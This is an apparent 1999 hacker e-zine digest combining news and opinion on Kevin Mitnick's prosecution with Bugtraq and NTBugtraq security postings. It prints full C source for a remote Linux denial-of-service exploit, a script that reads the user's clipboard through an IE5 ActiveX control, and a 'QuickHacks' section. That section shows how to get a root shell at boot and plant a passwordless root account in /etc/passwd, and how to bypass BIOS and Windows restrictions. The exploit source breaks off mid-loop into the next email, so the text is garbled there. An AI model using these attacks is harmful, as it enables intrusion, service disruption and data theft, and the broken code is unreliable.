sticker's not coming off my car-- not yet. By Kevin Poulsen March 22, 1999 After four long years in the house of many doors, 35-year-old Kevin Mitnick is ready to swallow a bitter pill, plead guilty to some of the twenty-five felonies on his indictment plate and accept a prison sentence a few months longer than the time he's already spent in stir. But I'm not scraping the Free Kevin bumper sticker from my car any time soon. The sticker stays because Tuesday's sealed plea agreement is now on the desk of Judge Mariana Pfaelzer, who may yet reject it as summarily as she refused to allow him the due process of a bail hearing. The sticker also stays because Mitnick is still facing a dusty California state charge from the early '90s which threatens to flip him out of the frying pan of federal lockup and into the fire of the notorious Los Angeles Country Jail-- better known as Hell. And even after his eventual release, Mitnick will spend up to three years in a technophobic virtual prison, barred from touching anything with a trace of silicon in it. So the sticker will continue to adorn my bumper as a reminder of the end of an era, and the dawn of a new and harsh morning. Kevin grew up to the extent that he did at a time when computers were still seen as mysterious and arcane, and exploring them was an innocent and joyful pastime for a few privileged youngsters. There was no talk of cyber- terrorism then; no suggestion that teenage technophiles were foreign operatives acting to overthrow the government. Kids who weren't old enough to drive were manipulating dizzying technology from their own bedrooms, and it was magic, pure and simple. Kevin Mitnick was already a legendary magician when I got my first computer in the early '80s. In today's Internet age, talentless teenaged taggers make national headlines by using pre-fab cracking tools to deface sitting-duck websites. So it takes some imagination to understand the genuine skill and artistry possessed by the likes of Kevin. He gained his knowledge from dumpsters and libraries and by tricking the guardians of technology with telephone con games.Applying that knowledge, doing things that weren't supposed to be possible,required creativity, resourcefulness, and tools that couldn't simply be downloaded. He was the archetypal trickster, sharing the joy of discovery with friends and loved ones through ingenious pranks; his hapless victims usually ended up too impressed with the magic to be overly annoyed with the inconvenience. While it seems inconceivable now, Mitnick didn't even cloak his efforts under a pseudonym. He was simply Kevin Mitnick. There was no reason to hide because what he was doing wasn't a crime. Nobody even minded much at first. It was all good clean fun. The Playground's Closed Then the world began to change, while Kevin remained the same. Communism died, and a notional hacker threat replaced the red menace as the enemy of everything good, decent, and American. The Internet took off in the early '90s, and pressure grew in Congress to make cyberspace safe for shopping. Computers were no longer the billion-dollar brains controlling our lives; instead they were on our desks and in our homes, and no one liked the idea that people like Kevin might get into them and muck around. Suddenly, the hacking that everyone around him thought was clever, amusing, and harmless during Mitnick's formative years became "computer fraud and abuse." Examining computer source code became "theft of proprietary information," and was equated to stealing money from a bank. Before he knew it, Kevin was a "danger to the community," held without bail like a murderer. And his rights were given the treatment normally reserved for accused drug kingpins. He was soon in front of an openly hostile court, facing the full brunt of a federal prosecution, as he watched the seasons change through the semitransparent polymer slits that pass for jailhouse windows. There was never any doubt that Kevin was guilty of at least some of the charges against him. There was never any doubt that he caused a lot of innocent people some serious hassles, and he needed to be slapped down. That was never really he point. The "Free Kevin" bumper sticker is on my car because every day that he spends locked up raises the punitive bar of zero tolerance another notch. Kevin Mitnick never damaged anything. He never stole a dime, never tried to profit from his efforts. He remained a laughing Peter Pan, while the world changed. I suspect he never really understood that his victims were no longer laughing along with him. He never lost his innocence. The sticker is there as a reminder of the new paradigm that punishes dumb innocence more severely than true guilt more harshly than fraud, theft, and robbery. The sticker is there because jail does a slow violence to a person, and Kevin Mitnick didn't deserve four years of that violence. -=- -=- 04.2 Mitnick's Judgment Day at Hand ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Douglas Thomas 9:00 a.m. 25.Mar.99.PST LOS ANGELES -- Celebrity cracker Kevin Mitnick will appear before US District Court Judge Marianne Pfaelzer on Friday for what could be the last time. Pfaelzer is scheduled to rule on a plea agreement jointly submitted by the government and defense team attorneys. Although neither side has discussed the details, a report leaked last week said Mitnick will plead guilty in exchange for a reduced sentence. The arrangement reportedly calls for Mitnick to spend at least an additional year in prison. Mitnick, in custody since 1995, is charged with copying proprietary software from the computers of cellular telephone manufacturers. Over the years, he has grown to be the cause célèbre of hackers and crackers the world over. Friday's scheduled appearance won't be the first time that Pfaelzer has considered a plea agreement from Mitnick. In 1989, Mitnick pleaded guilty to possessing unauthorized long-distance codes and copying security software from the Digital Equipment Corporation. Pfaelzer rejected a plea bargain in that case, and Mitnick spent a year in prison and six months in a halfway house. If Pfaelzer accepts the current plea, it would mean the end of the federal indictment. Mitnick, however, still faces state charges stemming from a 1993 arrest. He is accused of fraudulently obtaining information from the Department of Motor Vehicles and faxing it to a copy shop in Los Angeles. If found guilty, Mitnick could face up to four years of additional prison time. 04.3 Why We Still Have to Free Kevin Mitnick... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Update from www.kevinmitnick.com Why We Still Have to Free Kevin Mitnick... Assistant US Attorneys Defy Court Order Again March 30, 1999 So Kevin Mitnick has pleaded guilty and reached an agreement with the federal authorities. The story is over. Thanks for participating. You can all go home now. Not so fast. If you've ever been robbed at gunpoint, you know the feeling of wanting to resist, but then giving up your valuables because you feared the consequences of what would happen if you resisted more vigorously. We all want to be heroes, but there comes a time when one needs to make a painful sacrifice in order to survive at all. For more than four years, Kevin has held firm in prison, maintaining his innocence while trying to build a defense against the government's charges. The process of constructing such a case is a monumental one, even for highly paid defense attorneys. Now add to the mix the reality of being held captive in a federal prison that limits your "participation" in your defense to 20 minute collect phone calls and five hours per week in an inadequate law library, and you may begin to see what it was like. Not there yet? Kevin's legal team was overworked and underfunded whereas the prosecution had unlimited resources and as much time as they needed, not to mention a compliant court that granted them every excuse for their manipulation of the facts and circumstances in this case. Government Defiance of Court Order Apparently unwilling to miss the opportunity to kick someone while they're down, government prosecutors David Schindler and Christopher Painter have walked through Alice's looking glass and turned the law on its head once again -- they have instructed the legal staff at the Metropolitan Detention Center (MDC) that Kevin will no longer need access to the laptop computer that Kevin has been using to prepare his defense; first for the trial, and now for the sentencing hearing scheduled for June 14, 1999. Here are the circumstances: The legal staff at MDC supervises the prison's compliance with all legal matters affecting the prison. Kevin and his legal team convene in the attorney's visiting room at MDC to use a laptop computer to review the electronic evidence in Kevin's case. Kevin is currently reviewing that evidence to counter the government's likely arguments in support of restitution requirements, which in turn are based upon fictional losses alleged to have been suffered by the alleged victims in this case. Illegal Interference by Government On Monday, March 29, Kevin met his legal team in the visiting room, where they were going to use the laptop computer to review evidence in preparation for Kevin's sentencing hearing on June 14. After waiting two hours, Kevin was informed that either Assistant U.S. Attorneys Schindler or Painter had incorrectly advised MDC Legal Staff that Kevin would "no longer be needing access to the computer," and consequently, Kevin would not be permitted access to the laptop in order to prepare for his sentencing hearing. Defense Attorney Asserts Federal Court Order One member of Kevin's defense team (standing in for attorney Don Randolph, Kevin's attorney of record in this case who is currently on vacation) asserted unequivocally that there is a federal court order in place with the MDC ordering -- not suggesting, but ordering -- the MDC to provide access to a laptop computer for Kevin and his legal staff. Government's "Logic" Defies Justification Logic would suggest that if government prosecutors object to a federal court order, it is their responsibility to petition the court for redress. The actions by the government are an attempt to turn the situation on its head, and constitute an apparent effort by AUSAs Schindler and/or Painter to unlawfully influence the behavior of the legal staff of MDC. In addition, they may have known that Kevin's lead defense attorney was scheduled to be out of town this week, thus increasing the likelihood that they would succeed in delaying Kevin's access to the evidence against him. Prosecutors in Direct Violation of Court Order Actions by AUSAs Schindler and/or Painter to manipulate legal staff at MDC are in direct violation of a federal court order by Judge Marianna Pfaelzer ordering the MDC to provide a laptop computer to Kevin Mitnick. Their actions are in violation of federal law, and at this difficult stage of Kevin's case, can have no other purpose than to interfere with Kevin's right to participate fully in his defense. Call Your Congresspeople and Local Media We urge you to call your United States Representative and Senator as well as your local news media to alert them to the apparently willful violation of a federal court order by sworn officers of the court. Calls to the office of Rep. Henry Waxman (D-CA) may prove especially helpful. @HWA 04.4 Mitnick gets 46 months? ~~~~~~~~~~~~~~~~~~~~~~~ Mitnick Sentenced to 46 Months by Douglas Thomas 3:00 a.m. 29.Mar.99.PST The case is not closed on Kevin Mitnick, who was sentenced Friday to 46 months in prison after pleading guilty to seven counts of wire and computer fraud. The notorious cracker still faces California charges for computer fraud. US District Judge Mariana Pfaelzer accepted Mitnick's guilty plea to five of 25 federal counts of fraud plus two counts of fraud in Northern California. No date has been set for a trial on Southern California charges, which stem from a 1993 arrest in which Mitnick was accused of fraudulently obtaining information from the Department of Motor Vehicles. If convicted of those charges, he could face an additional four years behind bars. Friday's plea agreement set total damages of up to US$10 million. Prosecutors and defense lawyers could not reach agreement on restitution, which will be determined at Mitnick's sentencing hearing, scheduled for 14 June. Final motions and a pre- sentence investigation report are due by 1 June. Mitnick has already spent 48 months in a Los Angeles detention center, including 14 months for violating conditions of his supervised release. He could be released to a halfway house this fall. But US Attorney David Schindler said Mitnick would be in prison "at least through next year." Don Randolph, Mitnick's attorney, said his client was relieved to have his federal case resolved. In a prepared statement, Randolph said, "[Mitnick] can now see light at the end of the tunnel, and has a reasonable certainty that it is not another train approaching." @HWA 05.0 Sesquipedalian.c 0 length connection resetting exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 24 Mar 1999 23:19:37 -0500 From: John McDonald To: BUGTRAQ@netspace.org Subject: DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug Hi, The recent release of the Linux 2.2.4 kernel fixed a remote denial of service problem in the IP fragment handling code. If you are running a Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to get the latest version. In case that isn't feasible for you, I've included a patch in this post. The impact of this problem is that a remote attacker can effectively disable a target's IP connectivity. However, for the attack to succeed, the attacker will have to deliver several thousand packets to the target, which can take up to several minutes. A quick exploit and the patch are appended to the end of this post. The problem starts in ip_glue() in ip_fragment.c: /* Copy the data portions of all fragments into the new buffer. */ fp = qp->fragments; count = qp->ihlen; while(fp) { if ((fp->len < 0) || ((count + fp->len) > skb->len)) goto out_invalid; memcpy((ptr + fp->offset), fp->ptr, fp->len); if (count == qp->ihlen) { skb->dst = dst_clone(fp->skb->dst); skb->dev = fp->skb->dev; } count += fp->len; fp = fp->next; } The problem in this code is that if you can get a fragment into the qp->fragments list that has a length of 0, and is the first fragment in the list, then the call to dst_clone() will happen an extra time. The first time through the loop, count will necessarily equal qp->ihlen, causing dst_clone() to be called. However, if fp->len happens to equal 0, then count += fp->len won't increase it, and the next time through the loop, count will still equal qp->ihlen. dst_clone() increments a usage count on an element in the routing cache. Our 0 length fragment will cause this element in the cache to become stranded. The kernel will not free it when it does the garbage collection of the cache because it will think it is currently in use. The other component of the problem is that the call to allocate a new entry in the routing cache does a check to see if the hashtable that comprises the cache is at a saturated state. If it is, it proceeds to do a garbage collection. If the number of entries in the cache, after this garbage collection, is still higher than the threshold, then dst_alloc() will fail. So, if we generate enough stranded entries in the routing cache (4096 in 2.2.3) via our malicious frags, then all further calls to dst_alloc will fail. We can get a 0 length fragment into the head of the list by doing the following: Send a fragment at offset 0, with a length of X, and IP_MF set. This creates our list. Send a 0 length fragment at offset 0, where the ip header length is equal to the ip total length, and IP_MF is set. This will be treated as coming before the fragment already in our list, because it has an offset equal to the offset of the existing fragment. It doesn't overlap any, because it's end is equal to the following fragment's offset. Send a fragment at offset X, with IP_MF not set. This will mark the end of our set of fragments. ip_done() will return true because it will see the first frag going from 0 to 0, the second going from 0 to X, and the third going from X to the end. Our fragments will get passed into ip_glue(). -horizon Here is the patch: --- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999 +++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999 @@ -17,6 +17,7 @@ * xxxx : Overlapfrag bug. * Ultima : ip_expire() kernel panic. * Bill Hawes : Frag accounting and evictor fixes. + * John McDonald : 0 length frag bug. */ #include @@ -357,7 +358,7 @@ fp = qp->fragments; count = qp->ihlen; while(fp) { - if ((fp->len < 0) || ((count + fp->len) > skb->len)) + if ((fp->len <= 0) || ((count + fp->len) > skb->len)) goto out_invalid; memcpy((ptr + fp->offset), fp->ptr, fp->len); if (count == qp->ihlen) { And here is the exploit: /* * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3 * * by horizon * * This sends a series of IP fragments such that a 0 length fragment is first * in the fragment list. This causes a reference count on the cached routing * information for that packet's originator to be incremented one extra time. * This makes it impossible for the kernel to deallocate the destination entry * and remove it from the cache. * * If we send enough fragments such that there are at least 4096 stranded * dst cache entries, then the target machine will no longer be able to * allocate new cache entries, and IP communication will be effectively * disabled. You will need to set the delay such that packets are not being * dropped, and you will probably need to let the program run for a few * minutes to have the full effect. This was written for OpenBSD and Linux. * * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing. */ #include #include #include #include #include #include #include #include struct my_ip_header { unsigned char ip_hl:4, /* header length */ ip_v:4; /* version */ unsigned char ip_tos; /* type of service */ unsigned short ip_len; /* total length */ unsigned short ip_id; /* identification */ unsigned short ip_off; /* fragment offset field */ #define IP_RF 0x8000 /* reserved fragment flag */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ #define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ unsigned char ip_ttl; /* time to live */ unsigned char ip_p; /* protocol */ unsigned short ip_sum; /* checksum */ unsigned long ip_src, ip_dst; /* source and dest address */ }; struct my_udp_header { unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_ulen; unsigned short uh_sum; }; #define IHLEN (sizeof (struct my_ip_header)) #define UHLEN (sizeof (struct my_udp_header)) #ifdef __OpenBSD__ #define EXTRA 8 #else #define EXTRA 0 #endif unsigned short checksum(unsigned short *data,unsigned short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } unsigned long resolve( char *hostname) { long result; struct hostent *hp; if ((result=inet_addr(hostname))==-1) { if ((hp=gethostbyname(hostname))==0) { fprintf(stderr,"Can't resolve target.\n"); exit(1); } bcopy(hp->h_addr,&result,4); } return result; } void usage(void) { fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n"); exit(0); } void sendem(int s, unsigned long source, unsigned long dest, unsigned short sport, unsigned short dport) { static char buffer[8192]; struct my_ip_header *ip; struct my_udp_header *udp; struct sockaddr_in sa; bzero(&sa,sizeof(struct sockaddr_in)); sa.sin_family=AF_INET; sa.sin_port=htons(sport); sa.sin_addr.s_addr=dest; bzero(buffer,IHLEN+32); ip=(struct my_ip_header *)buffer; udp=(struct my_udp_header *)&(buffer[IHLEN]); ip->ip_v = 4; ip->ip_hl = IHLEN >>2; ip->ip_tos = 0; ip->ip_id = htons(random() & 0xFFFF); ip->ip_ttl = 142; ip->ip_p = IPPROTO_UDP; ip->ip_src = source; ip->ip_dst = dest; udp->uh_sport = htons(sport); udp->uh_dport = htons(dport); udp->uh_ulen = htons(64-UHLEN); udp->uh_sum = 0; /* Our first fragment will have an offset of 0, and be 32 bytes long. This gets added as the only element in the fragment list. */ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our second fragment will have an offset of 0, and a 0 length. This gets added to the list before our previous fragment, making it first in line. */ ip->ip_len = htons(IHLEN); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN); if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our third and final frag has an offset of 4 (32 bytes), and a length of 32 bytes. This passes our three frags up to ip_glue. */ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(32/8); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } } int main(int argc, char **argv) { int sock; int on=1,i; unsigned long source, dest; unsigned short sport=53, dport=16384; int delay=20000, count=15000; if (argc<3) usage(); while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1) { switch (i) { case 's': sport=atoi(optarg); break; case 'd': dport=atoi(optarg); break; case 'n': count=atoi(optarg); break; case 'u': delay=atoi(optarg); break; default: usage(); } } argc-=optind; argv+=optind; source=resolve(argv[0]); dest=resolve(argv[1]); srandom(time((time_t)0)*getpid()); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } fprintf(stdout,"\nStarting attack on %s ...",argv[1]); for (i=0; i To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: IE 5 security vulnerabilities Greetings, Microsoft delivers with IE 5 an Active X control called "DHTML Edit control Safe for Scripting for IE 5". In my opinion this control IS NOT SAFE AT ALL . I have found two vulnerabilities in this component : It makes public the clipboard and it allows cross-frame access. IE 4 is also affected as far as the control is a signed component and the browser will download it from MS site.(see below my comments about the CLSID). Demos are available at http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html I will briefly try to summarize the implications of this issues : 1- The hole makes public the clipboard. There is nothing new here. This is the third time I have reported this kind of vulnerability. MS says that this issue can be blocked by setting the "Allow paste operations via script" to 'prompt'. This security option is set to 'enable' by default (Medium security). IE 4 does not have this option and there is no way to avoid the exploit. 2- The hole allows cross-frame access The first Internet browser security rule is : scripts can only interact only whit documents same domain and protocol. MS calls this the cross-frame security, Netscape refers to this rule as "The same origin security policy". DHTML Editor violates this rule and allows "transaction spoofing", a malicious script can submit transactions without the user knowledge. I have asked my lawyer consultant about the issue and their response was : "Noboby can anymore use the IP addrress as a proof of an Internet crime against Internet Explorer users". MS says : "We don't see that this constitutes a security issue" . 3- Even if Microsoft fixes the hole the hole could exist forever. Why ? As far as I know this is the first time a hole is "SIGNED". MS has released an "dhtmed.cab" file as an ActiveX component signed by Microsoft ,anibody can distribute this file and the victim will only see a message telling him that the component is "Microsoft signed", I trust MS, everybody trust MS, we will accept the ActiveX. MS has invented a very clever method to sign software, but there is not a way to revoke the signature. 4- There is something rare in the CLSID Whenever an HTML page references a not registered CLSID nothing happens, just the object is not created. The "DHTML Edit Control" CLSID (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) is very special, Internet Explorer (4 and 5) will try to download the component from MS even if CODEBASE is not defined for the object. Is this a documented feature ? You can test this behaviour, : unregister the component "dhtmle.ocx" (using regsvr32.exe) and then load the page http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html Why the browser decides to go to MS site ? It only knows : clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A Acoording whit MS documentation a CODEBASE parameter must be explicited in the OBJECT "object" to download the component. Any idea ? Regards, Cuartango ------------------------------------------------------------------------------- http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html The DHTML Editor holes Microsoft delivers with IE 5 an Active X control called DHTML edit control, The Microsoft Dynamic HTML (DHTML) Editing Component allows Web authors and application developers to add WYSIWYG DHTML editing capabilities to their Web sites and applications. The control has two versions : DHTML Edit Control for IE 5 and DHTML Edit Control Safe for Scripting for IE 5 The first one is of course marked as not safe for scripting and you will be warned if an HTML page contains this object. The problem I have found : The second one is not safe at all. "DHTML Edit Control Safe for Scripting for IE 5" has in fact at least two security holes : 1- It makes public your clipboard (demo). According with Microsoft security rules access to Windows clipboard content is forbidden to Internet Explorer scripts unless the clipboard content was owned by the Explorer itself. This issue represents an important privacy leak. Workaround : Set security option "Allow paste operations via script" to "prompt". 2- It allows "cross-frame" access (demo). An HTML page or frame can read/write contents in frames owned by any domain, which is forbiden by cross-fame security rules. And still worst, It allows Tansaction spoofing. This is a very serious danger. The Safe version of ActiveX is not able to navigate but It can SUBMIT FORMS which means that a malicious WEB page (or E-Mail) can performs transactions agains any WEB site but YOU will be responsible because the transaction will have your own IP address. IE 4 is also affected if you accept the download of the ActiveX (Signed by Microsoft) Last update March 24 Año del señor de 1999 ------------------------------------------------------------------------------- http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html DHTMLE Clipboard vulnerability

DHTML Editor Clipboard vulnerability

According with Microsoft security rules access to Windows clipboard content is forbidden to Internet Explorer scripts unless the clipboard content was owned by the Explorer itself. If an script performs a "paste" operation over an input text box the operation will succeed only if data were copied to the clipboard from the Internet Explorer. The DHTMLE editor delivered whit Internet Explorer 5 violates the clipboard security rule. The clipboard data can then be transferred to a form input box and posted to a malicious WEB.

To see the demo "copy" some text (from any application) and click the button below :

The box below  is a Input Text Area Box your clipboard text data should be here

The box below is "DHTML Edit Control Safe for Scripting for IE 5" 

The script making public the clipboard is very simple :

function getcb()
dh.DOM.body.innerHTML="";            // clear body
dh.execCommand(5032);                     // paste
S1.value = dh.DOM.body.innerText;   // copy to text area

Back to DTHMLE Vulnerabilities

Created by Juan Carlos Garcia Cuartango

Visitors since Mar 22 Año del Señor de 1999

Last update Mar  24  Año del señor de 1999

------------------------------------------------------------------------------- http://pages.whowhere.com/computers/cuartangojc/dhtmle3.html DHTMLE vulnerabilities

The  DHTML Editor cross-frame hole


The box in the righ is an DHTML Edit Control Safe for scripting.
It shows a form loaded from a diferent domain (www.angelfire.com).
Click the button below and I will fill the form and submit It.

Dont worry about the message displayed. It is only a demo.

A malicious script inserted in a WEB page or in an HTML formated e-mail can submit transactions that will contain your IP address. (Imagine an   script writting menaces in the White House guess book).

Back to DTHMLE Vulnerabilities

Created by Juan Carlos Garcia Cuartango

Visitors since March 22 Año del Señor de 1999

Last update March 23 Año del señor de 1999


------------------------------------------------------------------------------- Date: Thu, 25 Mar 1999 10:06:01 -0800 From: Harry Goodwin To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: IE 5 security vulnerabilities I wanted to take a moment to thank Juan Carlos for bringing these issues to Microsoft's attention prior to posting the issues publicly. I also wanted to post Microsoft's response to the issues he's discovered. 1) Internet Explorer has customizable security settings in place for users who are concerned about allowing certain functionality. In this particular case, concerned users can easily block this behavior by checking either 'disable' or 'prompt' under "Allow paste operations via script" in the custom settings section in security zones. Using the IEAK, admins can also adjust the default setting for this option before distributing Internet Explorer to their users. The option is set to 'enable' by default to allow enhanced functionality. 2) Upon investigation we did find a cross domain security violation in the DHTML edit control which we will revoke, fix, and release. 3) Internet Explorer has a mechanism in place which allows Microsoft to release a .reg file to block ActiveX controls by changing a bit in the registry. 4) The following information found on MSDN (search on CodeBaseSearchPath) addresses this concern: When Internet Component Download is called to download code, it traverses the Internet search path to look for the desired component. This path is a list of object store servers that will be queried every time components are downloaded using CoGetClassObjectFromURL. This way, even if an tag in an HTML document does not specify a CODEBASE location to download code for an embedded OLE control, the Internet Component Download will still use the Internet search path to find the necessary code. Internet search path syntax The search path is specified in a string in the registry, under the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CodeBaseSearchPath. The value for this key is a string in the following format: CodeBaseSearchPath = ; ; ... ; CODEBASE; ; ... ; In this format, each of URL1 through URLn is an absolute URL pointing to HTTP servers acting as "object stores". When processing a call to CoGetClassObjectFromURL, the Internet Component Download service will first try downloading the desired code from the locations URL1 through URLm, then try the location specified in the szCodeURL parameter (corresponding to the CODEBASE attribute in the tag), and will finally try the locations specified in locations URLm+1 through URLn. Note that if the CODEBASE keyword is not included in the key, calls to CoGetClassObjectFromURL will never check the szCodeURL location for downloading code. By removing the CODEBASE keyword from the key, corporate intranet administrators can effectively disable Internet Component Download for corporate users. Thanks, Harry ------------------------------------------------------------------------------- Date: Thu, 25 Mar 1999 14:57:51 -0500 From: Phil Brass To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: IE 5 security vulnerabilities > 4) The following information found on MSDN (search on > CodeBaseSearchPath) addresses this concern: When Internet Component > Download is called to download code, it traverses the Internet search path > to > look for the desired component. This path is a list of object store servers > that will be queried every time components are downloaded using > CoGetClassObjectFromURL. This way, even if an tag in an HTML > document does not specify a CODEBASE location to download code for an > embedded OLE control, the Internet Component Download will still use the > Internet search path to find the necessary code. > Internet search path syntax > The search path is specified in a string in the registry, under > the key > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet > Settings\CodeBaseSearchPath. The value for this key is a string in the > following format: > CodeBaseSearchPath = ; ; ... ; CODEBASE; > ; > ... ; On my NT4 SP3 box, permissions on this key are set to Everyone: Special Access, which includes set value. Therefore, anyone who is a user on this box can control where every other user downloads their controls from. Is that OK? Phil @HWA 07.0 QuickHacks and tips from ManicX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Quick Tricks Now Just a few quick tips ( pulled all the other stuff, its for your own good :þ ) Stuff Covered - Linux, Mobiles, Windows, BIOS, System: Nokia 5110 Crash it Send an SMS message full of 160 full stops to the phone It will now beep and flash for 30 sec's or else just turn itself off System: Linux (with lilo installed and local access) Gives a root shell / root account reboot your machine on the lilo: prompt type in what-linux-is-called-in-/etc/lilo.conf init=/bin/bash rw (i.e. linux init=/bin/bash rw ) linux will now start to boot and stop after a few error message you now have a root shell (you will have very few commands) so type in the following cat >> /etc/passwd manicx::0:0:new root account:/root:/bin/bash (hit crtl+d to get out of cat) sync (just to bring your files up to date) reboot and login with your new root account called manicx (no password) System: Linux (with local access) Gives a root shell / root account Boot with the rescue.img available on most linux distro cd's voila one root shell you will probably have to mount your linux partition (hda5 is the partition might be hda2 > hda7) mkdir /linux mount /dev/hda5 /linux cat >> /linux/etc/passwd manicx::0:0:new root account:/root:/bin/bash (hit crtl+d to get out of cat) sync (just to bring your files up to date) reboot and login with your new root account called manicx (no password) System: Windows Remove All policy restrictions Open regedit Scroll down to : HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies Anything with a value of "1" is turned ON so double click on it and change the value to "0" to turn it OFF (Or if you cant be arsed just delete them, Its best to note changes and change them back when your finished) When your finished just exit you should now have access to the all the restricted commands (run/dosprompt/control_panel/etc) (Win98- You will probably have to reboot before the changes take effect) System: Windows 95 Close down the start menu :þ Double click the [Start] button, so its got a black dotted line on it (this means its got focus) hit alt and - (minus key) at the same time, voila you can now move or close the startmenu System: Windows Gets rid of BIOS password (and resets CMOS settings) killcmos.zip Or Pull out the cmos battery for 5-10 mins (you need to know the setup) System: Windows Get past any password protection before boot-up Try booting from a floppy or holding down the shift key during startup @HWA 08.0 NT4 index server 2.0 vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 23 Mar 1999 23:40:55 -0000 From: Mnemonix To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Index Server 2.0 and the Registry When Microsoft's Index Server 2.0 is installed on NT 4 with Internet Information Server 4 it opens a new "AllowedPath" into the Windows NT Registry. Administrators can control who can access the Windows NT Registry via the network by editing permissions on the Winreg key found under HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg By default, on NT Server 4, the permissions on this key are set to Administrators with Full Control. No-one else should have access (although it doesn't really work out like this in the end.) There are certain paths through the Registry that remote users, whether they are Administrators are not, may access. These are listed in the AllowedPaths subkey found under the Winreg key. These paths are to allow basic network operations such as printing etc to continue as normal. Index Server 2.0 creates a new "AllowedPath": HKLM\System\CurrentControlset\Control\ContentIndex\Catalogs meaning that anyone with an local or domain account for that machine, including Guests, are able to discover the physical path to directories being indexed or if a directory found in a network share is being index they can learn the name of the machine on which the share resides and the name of the user account used to access that share on behalf of Index and Internet Information Server. Permissions on the above key and its sub-key give Everyone read access. Note that regedit and regedt32 can not be used to access this information. Tools such as reg.exe or home-baked efforts must be used. In most cases this issue represents a mild risk, but one worth noting and resolving by removing if this adversely affects you and your security policy. Cheers, David Litchfield http://www.infowar.co.uk/mnemonix/ @HWA 09.0 Yahoo news ticker has plaintext passwords in config files... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FOR IMMEDIATE RELEASE: Application: Yahoo! NEWS TICKER Platforms : Win95,98,NT Advisory: The installation process of the Yahoo! NEWS TICKER leaves a file name "install.log" in the program directory. The file contains plaintext userid and password. The installation process also sets registry entries under hkey_local_machine/software/netcontrols/ticker that contain the plaintext userID and password. Each yahoo account uses the same password/userid for all parts including auctions, news, my.yahoo, classifieds, and most importantly, EMAIL!!!! this is an independant finding not a release by Yahoo!. Advisory by CSB 24MARCH99 @HWA 10.0 Defacing websites? read this from bufferoverflow/attrition. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # mv index.new index.html # echo "03.20.99" # echo "I do not advocate web defacement or intrusive hacking." Introduction The Ends Justify The Means. My Rant In Plain English. Justification Suggestions For Improving Your Hacked Pages. The Good, The Bad, and The Impressive. Introduction Browsing the web, enjoying your time, nothing better to do. Casual search for something interesting to read, or maybe even a little research for a project or term paper. Click here, click there, link from site to site. Some mostly worthless, nothing more than links to other pages. Same old thing, different day.. until today. You typed in the URL for a web page that promised to have your info. Instead of computer pricing or biology, you found a cryptic message scrawled out claiming something, hell if you could tell what it was. You click on and forget about it. Yes, that was a hacked web page. One of the favored things of crackers to boast their deeds. Proof that they alone control the universe and 'own' someone else's computers. Self reasoning and a shoddy moral vindication of a petty break-in to some no name computer. At least, that sums up almost 99% of current web defacement activities. Why? The Ends Justify The Means. Ok, lets buy that argument for now. The 'means' in our case is the hacking of a site and the 'ends' constitutes replacement of the existing web page with a new 'improved' page carrying the hacker's message. In today's digital world, it is the equivalent of spray painting a wall to have your message seen by passerbys. Stop here and think about all of the spraypaint graffiti you have seen in the last six months. How much can you remember? Odd isn't it. Some person took the time and effort to break the law in order to get their message out. Risk possible incarceration for words or ideas they felt were important, yet you can't remember any (or all) of it. Why? Simple 